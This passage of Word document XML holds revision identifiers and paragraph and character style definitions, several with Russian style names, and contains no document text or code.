    <w:rsid w:val="00EC02DF"/>
    <w:rsid w:val="00EC038F"/>
    <w:rsid w:val="00EC0A8A"/>
    <w:rsid w:val="00EC0C9F"/>
    <w:rsid w:val="00EC10FB"/>
    <w:rsid w:val="00EC1180"/>
    <w:rsid w:val="00EC1915"/>
    <w:rsid w:val="00EC20F7"/>
    <w:rsid w:val="00EC319F"/>
    <w:rsid w:val="00EC33FE"/>
    <w:rsid w:val="00EC34B6"/>
    <w:rsid w:val="00EC3549"/>
    <w:rsid w:val="00EC3ECE"/>
    <w:rsid w:val="00EC3FC1"/>
    <w:rsid w:val="00EC4920"/>
    <w:rsid w:val="00EC4D74"/>
    <w:rsid w:val="00EC4F4C"/>
    <w:rsid w:val="00EC521B"/>
    <w:rsid w:val="00EC57CF"/>
    <w:rsid w:val="00EC57EF"/>
    <w:rsid w:val="00EC5A42"/>
    <w:rsid w:val="00EC6336"/>
    <w:rsid w:val="00EC6908"/>
    <w:rsid w:val="00EC6C9B"/>
    <w:rsid w:val="00EC6FB0"/>
    <w:rsid w:val="00EC70FC"/>
    <w:rsid w:val="00EC78A6"/>
    <w:rsid w:val="00EC7CF2"/>
    <w:rsid w:val="00EC7DC1"/>
    <w:rsid w:val="00ED08CF"/>
    <w:rsid w:val="00ED100B"/>
    <w:rsid w:val="00ED1773"/>
    <w:rsid w:val="00ED19DE"/>
    <w:rsid w:val="00ED1E08"/>
    <w:rsid w:val="00ED25B6"/>
    <w:rsid w:val="00ED40EA"/>
    <w:rsid w:val="00ED44C8"/>
    <w:rsid w:val="00ED4F8A"/>
    <w:rsid w:val="00ED5C39"/>
    <w:rsid w:val="00ED61FC"/>
    <w:rsid w:val="00ED69CC"/>
    <w:rsid w:val="00ED79FF"/>
    <w:rsid w:val="00ED7ACC"/>
    <w:rsid w:val="00ED7CCA"/>
    <w:rsid w:val="00ED7E7C"/>
    <w:rsid w:val="00EE046D"/>
    <w:rsid w:val="00EE0F35"/>
    <w:rsid w:val="00EE0FD6"/>
    <w:rsid w:val="00EE1B1A"/>
    <w:rsid w:val="00EE2001"/>
    <w:rsid w:val="00EE22B7"/>
    <w:rsid w:val="00EE2C1C"/>
    <w:rsid w:val="00EE3275"/>
    <w:rsid w:val="00EE3FCA"/>
    <w:rsid w:val="00EE4569"/>
    <w:rsid w:val="00EE4F65"/>
    <w:rsid w:val="00EE509E"/>
    <w:rsid w:val="00EE5570"/>
    <w:rsid w:val="00EE59EC"/>
    <w:rsid w:val="00EE5B96"/>
    <w:rsid w:val="00EE5CC2"/>
    <w:rsid w:val="00EE6224"/>
    <w:rsid w:val="00EE65DA"/>
    <w:rsid w:val="00EE6650"/>
    <w:rsid w:val="00EE7587"/>
    <w:rsid w:val="00EE75BF"/>
    <w:rsid w:val="00EE7803"/>
    <w:rsid w:val="00EE7AB0"/>
    <w:rsid w:val="00EF0068"/>
    <w:rsid w:val="00EF03CB"/>
    <w:rsid w:val="00EF0544"/>
    <w:rsid w:val="00EF0836"/>
    <w:rsid w:val="00EF156E"/>
    <w:rsid w:val="00EF1860"/>
    <w:rsid w:val="00EF1E59"/>
    <w:rsid w:val="00EF1F52"/>
    <w:rsid w:val="00EF2151"/>
    <w:rsid w:val="00EF2FBD"/>
    <w:rsid w:val="00EF38D8"/>
    <w:rsid w:val="00EF4163"/>
    <w:rsid w:val="00EF4C4A"/>
    <w:rsid w:val="00EF4D34"/>
    <w:rsid w:val="00EF50D8"/>
    <w:rsid w:val="00EF5395"/>
    <w:rsid w:val="00EF5864"/>
    <w:rsid w:val="00EF6134"/>
    <w:rsid w:val="00EF692F"/>
    <w:rsid w:val="00EF6AC8"/>
    <w:rsid w:val="00EF6D70"/>
    <w:rsid w:val="00EF7013"/>
    <w:rsid w:val="00EF7E5B"/>
    <w:rsid w:val="00F00548"/>
    <w:rsid w:val="00F007C5"/>
    <w:rsid w:val="00F017D4"/>
    <w:rsid w:val="00F01A5E"/>
    <w:rsid w:val="00F01ABE"/>
    <w:rsid w:val="00F01CCD"/>
    <w:rsid w:val="00F025EA"/>
    <w:rsid w:val="00F02A6A"/>
    <w:rsid w:val="00F02B78"/>
    <w:rsid w:val="00F03484"/>
    <w:rsid w:val="00F035EC"/>
    <w:rsid w:val="00F036B2"/>
    <w:rsid w:val="00F03AA1"/>
    <w:rsid w:val="00F03CED"/>
    <w:rsid w:val="00F03D7B"/>
    <w:rsid w:val="00F0450B"/>
    <w:rsid w:val="00F04643"/>
    <w:rsid w:val="00F04C97"/>
    <w:rsid w:val="00F05D59"/>
    <w:rsid w:val="00F05E16"/>
    <w:rsid w:val="00F06D42"/>
    <w:rsid w:val="00F07389"/>
    <w:rsid w:val="00F07644"/>
    <w:rsid w:val="00F07A3D"/>
    <w:rsid w:val="00F07D39"/>
    <w:rsid w:val="00F07E38"/>
    <w:rsid w:val="00F101E6"/>
    <w:rsid w:val="00F10267"/>
    <w:rsid w:val="00F10615"/>
    <w:rsid w:val="00F10942"/>
    <w:rsid w:val="00F1143A"/>
    <w:rsid w:val="00F115F6"/>
    <w:rsid w:val="00F119AB"/>
    <w:rsid w:val="00F11DFA"/>
    <w:rsid w:val="00F127A9"/>
    <w:rsid w:val="00F12AAC"/>
    <w:rsid w:val="00F1300D"/>
    <w:rsid w:val="00F135C0"/>
    <w:rsid w:val="00F13BC1"/>
    <w:rsid w:val="00F13BCF"/>
    <w:rsid w:val="00F14524"/>
    <w:rsid w:val="00F14930"/>
    <w:rsid w:val="00F14AA3"/>
    <w:rsid w:val="00F14C04"/>
    <w:rsid w:val="00F14DCA"/>
    <w:rsid w:val="00F1546A"/>
    <w:rsid w:val="00F15C30"/>
    <w:rsid w:val="00F16034"/>
    <w:rsid w:val="00F16065"/>
    <w:rsid w:val="00F16370"/>
    <w:rsid w:val="00F16526"/>
    <w:rsid w:val="00F167E1"/>
    <w:rsid w:val="00F177FE"/>
    <w:rsid w:val="00F20D8F"/>
    <w:rsid w:val="00F22479"/>
    <w:rsid w:val="00F225B5"/>
    <w:rsid w:val="00F2311A"/>
    <w:rsid w:val="00F24A74"/>
    <w:rsid w:val="00F24D38"/>
    <w:rsid w:val="00F2563C"/>
    <w:rsid w:val="00F2686E"/>
    <w:rsid w:val="00F27486"/>
    <w:rsid w:val="00F276D5"/>
    <w:rsid w:val="00F27C4D"/>
    <w:rsid w:val="00F27F05"/>
    <w:rsid w:val="00F300C5"/>
    <w:rsid w:val="00F30214"/>
    <w:rsid w:val="00F303AE"/>
    <w:rsid w:val="00F3106D"/>
    <w:rsid w:val="00F310AB"/>
    <w:rsid w:val="00F316CE"/>
    <w:rsid w:val="00F31AE1"/>
    <w:rsid w:val="00F31F40"/>
    <w:rsid w:val="00F32675"/>
    <w:rsid w:val="00F334BF"/>
    <w:rsid w:val="00F338DC"/>
    <w:rsid w:val="00F33ED1"/>
    <w:rsid w:val="00F34BF9"/>
    <w:rsid w:val="00F34E8E"/>
    <w:rsid w:val="00F35FD8"/>
    <w:rsid w:val="00F362D3"/>
    <w:rsid w:val="00F3675E"/>
    <w:rsid w:val="00F370E6"/>
    <w:rsid w:val="00F4042D"/>
    <w:rsid w:val="00F4116D"/>
    <w:rsid w:val="00F4120D"/>
    <w:rsid w:val="00F413C2"/>
    <w:rsid w:val="00F41BFB"/>
    <w:rsid w:val="00F41D07"/>
    <w:rsid w:val="00F41D73"/>
    <w:rsid w:val="00F41EAD"/>
    <w:rsid w:val="00F42695"/>
    <w:rsid w:val="00F42A4F"/>
    <w:rsid w:val="00F42E30"/>
    <w:rsid w:val="00F432F4"/>
    <w:rsid w:val="00F4338A"/>
    <w:rsid w:val="00F43720"/>
    <w:rsid w:val="00F43FD2"/>
    <w:rsid w:val="00F444CB"/>
    <w:rsid w:val="00F44A62"/>
    <w:rsid w:val="00F44CF9"/>
    <w:rsid w:val="00F4552C"/>
    <w:rsid w:val="00F4588E"/>
    <w:rsid w:val="00F45F02"/>
    <w:rsid w:val="00F462FB"/>
    <w:rsid w:val="00F46409"/>
    <w:rsid w:val="00F46C64"/>
    <w:rsid w:val="00F47019"/>
    <w:rsid w:val="00F47AEC"/>
    <w:rsid w:val="00F47CD4"/>
    <w:rsid w:val="00F50243"/>
    <w:rsid w:val="00F50F5B"/>
    <w:rsid w:val="00F50F97"/>
    <w:rsid w:val="00F51149"/>
    <w:rsid w:val="00F518C1"/>
    <w:rsid w:val="00F53095"/>
    <w:rsid w:val="00F53C30"/>
    <w:rsid w:val="00F543CC"/>
    <w:rsid w:val="00F544E9"/>
    <w:rsid w:val="00F54ECA"/>
    <w:rsid w:val="00F55038"/>
    <w:rsid w:val="00F55404"/>
    <w:rsid w:val="00F55729"/>
    <w:rsid w:val="00F559B2"/>
    <w:rsid w:val="00F56C73"/>
    <w:rsid w:val="00F5741D"/>
    <w:rsid w:val="00F5779D"/>
    <w:rsid w:val="00F60E5F"/>
    <w:rsid w:val="00F61260"/>
    <w:rsid w:val="00F61837"/>
    <w:rsid w:val="00F61CD9"/>
    <w:rsid w:val="00F61CEB"/>
    <w:rsid w:val="00F620F7"/>
    <w:rsid w:val="00F6261F"/>
    <w:rsid w:val="00F6263A"/>
    <w:rsid w:val="00F6288E"/>
    <w:rsid w:val="00F628AB"/>
    <w:rsid w:val="00F629C8"/>
    <w:rsid w:val="00F632E2"/>
    <w:rsid w:val="00F63F5D"/>
    <w:rsid w:val="00F64023"/>
    <w:rsid w:val="00F64247"/>
    <w:rsid w:val="00F64797"/>
    <w:rsid w:val="00F64959"/>
    <w:rsid w:val="00F64A9C"/>
    <w:rsid w:val="00F64EE4"/>
    <w:rsid w:val="00F65508"/>
    <w:rsid w:val="00F65B7B"/>
    <w:rsid w:val="00F65DCC"/>
    <w:rsid w:val="00F66610"/>
    <w:rsid w:val="00F66BF9"/>
    <w:rsid w:val="00F67459"/>
    <w:rsid w:val="00F67563"/>
    <w:rsid w:val="00F67C35"/>
    <w:rsid w:val="00F701F9"/>
    <w:rsid w:val="00F72169"/>
    <w:rsid w:val="00F72210"/>
    <w:rsid w:val="00F722D7"/>
    <w:rsid w:val="00F727BF"/>
    <w:rsid w:val="00F72B12"/>
    <w:rsid w:val="00F72B2D"/>
    <w:rsid w:val="00F738D1"/>
    <w:rsid w:val="00F73A31"/>
    <w:rsid w:val="00F73B52"/>
    <w:rsid w:val="00F7475D"/>
    <w:rsid w:val="00F74C5F"/>
    <w:rsid w:val="00F75587"/>
    <w:rsid w:val="00F75A0C"/>
    <w:rsid w:val="00F77122"/>
    <w:rsid w:val="00F772DC"/>
    <w:rsid w:val="00F778C7"/>
    <w:rsid w:val="00F77D49"/>
    <w:rsid w:val="00F77FA8"/>
    <w:rsid w:val="00F8063F"/>
    <w:rsid w:val="00F8067E"/>
    <w:rsid w:val="00F80B99"/>
    <w:rsid w:val="00F80C2E"/>
    <w:rsid w:val="00F81279"/>
    <w:rsid w:val="00F81C8E"/>
    <w:rsid w:val="00F8223B"/>
    <w:rsid w:val="00F82707"/>
    <w:rsid w:val="00F82762"/>
    <w:rsid w:val="00F82B28"/>
    <w:rsid w:val="00F82BE6"/>
    <w:rsid w:val="00F83200"/>
    <w:rsid w:val="00F83550"/>
    <w:rsid w:val="00F8360B"/>
    <w:rsid w:val="00F84171"/>
    <w:rsid w:val="00F84826"/>
    <w:rsid w:val="00F84837"/>
    <w:rsid w:val="00F84D46"/>
    <w:rsid w:val="00F84DEA"/>
    <w:rsid w:val="00F850EA"/>
    <w:rsid w:val="00F85535"/>
    <w:rsid w:val="00F85A9D"/>
    <w:rsid w:val="00F86A6E"/>
    <w:rsid w:val="00F86DD8"/>
    <w:rsid w:val="00F878CD"/>
    <w:rsid w:val="00F9000F"/>
    <w:rsid w:val="00F90023"/>
    <w:rsid w:val="00F902E5"/>
    <w:rsid w:val="00F9035C"/>
    <w:rsid w:val="00F9085D"/>
    <w:rsid w:val="00F91167"/>
    <w:rsid w:val="00F91694"/>
    <w:rsid w:val="00F917D4"/>
    <w:rsid w:val="00F91B80"/>
    <w:rsid w:val="00F92450"/>
    <w:rsid w:val="00F93059"/>
    <w:rsid w:val="00F93133"/>
    <w:rsid w:val="00F93537"/>
    <w:rsid w:val="00F93B2A"/>
    <w:rsid w:val="00F93E7C"/>
    <w:rsid w:val="00F93E98"/>
    <w:rsid w:val="00F944F3"/>
    <w:rsid w:val="00F94A8B"/>
    <w:rsid w:val="00F94FB3"/>
    <w:rsid w:val="00F95A9D"/>
    <w:rsid w:val="00F9608F"/>
    <w:rsid w:val="00F969D5"/>
    <w:rsid w:val="00F96FF1"/>
    <w:rsid w:val="00F97143"/>
    <w:rsid w:val="00F976BE"/>
    <w:rsid w:val="00FA0037"/>
    <w:rsid w:val="00FA00F9"/>
    <w:rsid w:val="00FA01FC"/>
    <w:rsid w:val="00FA03E8"/>
    <w:rsid w:val="00FA066F"/>
    <w:rsid w:val="00FA070E"/>
    <w:rsid w:val="00FA07D8"/>
    <w:rsid w:val="00FA0BEB"/>
    <w:rsid w:val="00FA12C1"/>
    <w:rsid w:val="00FA187A"/>
    <w:rsid w:val="00FA192B"/>
    <w:rsid w:val="00FA1F96"/>
    <w:rsid w:val="00FA2133"/>
    <w:rsid w:val="00FA239F"/>
    <w:rsid w:val="00FA2EC3"/>
    <w:rsid w:val="00FA3FBE"/>
    <w:rsid w:val="00FA45CE"/>
    <w:rsid w:val="00FA594D"/>
    <w:rsid w:val="00FA5BE5"/>
    <w:rsid w:val="00FA5E5B"/>
    <w:rsid w:val="00FA6C95"/>
    <w:rsid w:val="00FA768A"/>
    <w:rsid w:val="00FA7C80"/>
    <w:rsid w:val="00FB063F"/>
    <w:rsid w:val="00FB0CC9"/>
    <w:rsid w:val="00FB0E8E"/>
    <w:rsid w:val="00FB1A1C"/>
    <w:rsid w:val="00FB1B64"/>
    <w:rsid w:val="00FB2005"/>
    <w:rsid w:val="00FB2533"/>
    <w:rsid w:val="00FB4189"/>
    <w:rsid w:val="00FB469D"/>
    <w:rsid w:val="00FB5729"/>
    <w:rsid w:val="00FB57FE"/>
    <w:rsid w:val="00FB5C5F"/>
    <w:rsid w:val="00FB5FC1"/>
    <w:rsid w:val="00FB69A6"/>
    <w:rsid w:val="00FB6CB4"/>
    <w:rsid w:val="00FB6D7B"/>
    <w:rsid w:val="00FB6F75"/>
    <w:rsid w:val="00FB706A"/>
    <w:rsid w:val="00FB7508"/>
    <w:rsid w:val="00FB76FA"/>
    <w:rsid w:val="00FC0232"/>
    <w:rsid w:val="00FC0286"/>
    <w:rsid w:val="00FC0370"/>
    <w:rsid w:val="00FC0385"/>
    <w:rsid w:val="00FC056E"/>
    <w:rsid w:val="00FC0EFC"/>
    <w:rsid w:val="00FC10AA"/>
    <w:rsid w:val="00FC115A"/>
    <w:rsid w:val="00FC18F5"/>
    <w:rsid w:val="00FC1DCE"/>
    <w:rsid w:val="00FC208A"/>
    <w:rsid w:val="00FC22F1"/>
    <w:rsid w:val="00FC2BCF"/>
    <w:rsid w:val="00FC329E"/>
    <w:rsid w:val="00FC342E"/>
    <w:rsid w:val="00FC3AA1"/>
    <w:rsid w:val="00FC4486"/>
    <w:rsid w:val="00FC5031"/>
    <w:rsid w:val="00FC5568"/>
    <w:rsid w:val="00FC5A43"/>
    <w:rsid w:val="00FC5A71"/>
    <w:rsid w:val="00FC5A7B"/>
    <w:rsid w:val="00FC5BF8"/>
    <w:rsid w:val="00FC5E10"/>
    <w:rsid w:val="00FC6044"/>
    <w:rsid w:val="00FC6AD3"/>
    <w:rsid w:val="00FC6FB8"/>
    <w:rsid w:val="00FC7785"/>
    <w:rsid w:val="00FD013B"/>
    <w:rsid w:val="00FD0330"/>
    <w:rsid w:val="00FD0827"/>
    <w:rsid w:val="00FD0D79"/>
    <w:rsid w:val="00FD12BD"/>
    <w:rsid w:val="00FD2098"/>
    <w:rsid w:val="00FD29E5"/>
    <w:rsid w:val="00FD31E8"/>
    <w:rsid w:val="00FD3427"/>
    <w:rsid w:val="00FD3700"/>
    <w:rsid w:val="00FD3B38"/>
    <w:rsid w:val="00FD44C3"/>
    <w:rsid w:val="00FD4652"/>
    <w:rsid w:val="00FD468C"/>
    <w:rsid w:val="00FD4A8D"/>
    <w:rsid w:val="00FD51DE"/>
    <w:rsid w:val="00FD70C0"/>
    <w:rsid w:val="00FD7523"/>
    <w:rsid w:val="00FD7675"/>
    <w:rsid w:val="00FD77BB"/>
    <w:rsid w:val="00FD7B2E"/>
    <w:rsid w:val="00FE024C"/>
    <w:rsid w:val="00FE0318"/>
    <w:rsid w:val="00FE07EC"/>
    <w:rsid w:val="00FE084A"/>
    <w:rsid w:val="00FE0E82"/>
    <w:rsid w:val="00FE1B5D"/>
    <w:rsid w:val="00FE2025"/>
    <w:rsid w:val="00FE262C"/>
    <w:rsid w:val="00FE2B61"/>
    <w:rsid w:val="00FE3053"/>
    <w:rsid w:val="00FE334B"/>
    <w:rsid w:val="00FE39EF"/>
    <w:rsid w:val="00FE3EDD"/>
    <w:rsid w:val="00FE3EFB"/>
    <w:rsid w:val="00FE5128"/>
    <w:rsid w:val="00FE59E4"/>
    <w:rsid w:val="00FE661A"/>
    <w:rsid w:val="00FE6EC5"/>
    <w:rsid w:val="00FE75A8"/>
    <w:rsid w:val="00FE770E"/>
    <w:rsid w:val="00FE7A33"/>
    <w:rsid w:val="00FE7B5D"/>
    <w:rsid w:val="00FE7E83"/>
    <w:rsid w:val="00FF0766"/>
    <w:rsid w:val="00FF1283"/>
    <w:rsid w:val="00FF1335"/>
    <w:rsid w:val="00FF22D4"/>
    <w:rsid w:val="00FF299E"/>
    <w:rsid w:val="00FF2F17"/>
    <w:rsid w:val="00FF3183"/>
    <w:rsid w:val="00FF33B2"/>
    <w:rsid w:val="00FF3B9F"/>
    <w:rsid w:val="00FF3EE6"/>
    <w:rsid w:val="00FF3FAB"/>
    <w:rsid w:val="00FF537D"/>
    <w:rsid w:val="00FF6A36"/>
    <w:rsid w:val="00FF717A"/>
    <w:rsid w:val="00FF7626"/>
    <w:rsid w:val="00FF7A78"/>
    <w:rsid w:val="00FF7F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B1AA79BD-05E8-4817-9863-A16FA7E6E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semiHidden="1" w:uiPriority="9"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44E2"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D73D74"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="365F91"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EC02DF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003462B4"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003462B4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00102840"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="60"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="005F7262"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="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locked/>
    <w:rsid w:val="00D73D74"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="365F91"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rsid w:val="00EC02DF"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BE31B8"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Typewriter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F91694"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="003462B4"/>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mw-headline">
    <w:name w:val="mw-headline"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00346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link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc3">
    <w:name w:val="sc3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="re1">
    <w:name w:val="re1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="re0">
    <w:name w:val="re0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="st0">
    <w:name w:val="st0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="re2">
    <w:name w:val="re2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003462B4"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-">
    <w:name w:val="HTML Top of Form"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="z-0"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D73D74"/>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link w:val="z-"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00D73D74"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-1">
    <w:name w:val="HTML Bottom of Form"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="z-2"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D73D74"/>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link w:val="z-1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00D73D74"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00D73D74"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D73D74"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="Текст выноски Знак"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00D73D74"/>
